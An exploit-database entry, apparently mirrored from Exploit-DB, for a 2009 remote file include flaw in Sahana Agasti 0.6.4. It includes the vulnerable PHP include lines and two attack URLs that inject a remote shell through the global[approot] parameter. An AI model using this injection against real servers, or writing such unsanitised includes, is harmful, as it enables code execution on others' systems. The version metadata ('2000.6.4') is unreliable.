Sahana Agasti - exploit.company

vendor:

Sahana Agasti

by:

n0n0x

7.5

CVSS

HIGH

Multiple Remote File Include

CWE

Product Name: Sahana Agasti

Affected Version From: 2000.6.4

Affected Version To: 2000.6.4

Patch Exists: YES

Related CWE: N/A

CPE: a:sahana_foundation:sahana_agasti

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sahana Agasti <= 0.6.4 Multiple Remote File Include

Sahana Agasti version 0.6.4 and prior is vulnerable to multiple remote file include. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable server. The vulnerable code can be found in sahana-phase2/mod/vm/controller/AccessController.php and sahana-phase2/mod/vm/model/dao.php, where the attacker can inject malicious code into the global[approot] parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Sahana Agasti.

Source

Exploit-DB raw data:

#Sahana Agasti <= 0.6.4 Multiple Remote File Include
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Script site: http://www.sahanafoundation.org/
#Download: https://launchpad.net/sahana-agasti/

#Bug:

25 global $global;
26 require_once($global['approot'].'inc/lib_security/lib_acl.inc');
27 require_once($global['approot'].'inc/lib_errors.inc');

#Vuln: sahana-phase2/mod/vm/controller/AccessController.php?global[approot]=[y0ur fuck!ng shell]

#Bug:

31 global $global;
32 require_once($global['approot'].'inc/lib_paging.inc');

#Vuln: sahana-phase2/mod/vm/model/dao.php?global[approot]=[y0ur fuck!ng shell]

****************************************************************************************************************
[!] Thanks:
  
    manadocoding.org, sekuritionline.net
****************************************************************************************************************
[!] Greetz:
   
    str0ke, angky.tatoki, EA ngel, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin, team_elite
    devilbat. cr4wl3r, cyberl0g, lumut, AntiHack, DskyMC, mr.c, donyskaynet
****************************************************************************************************************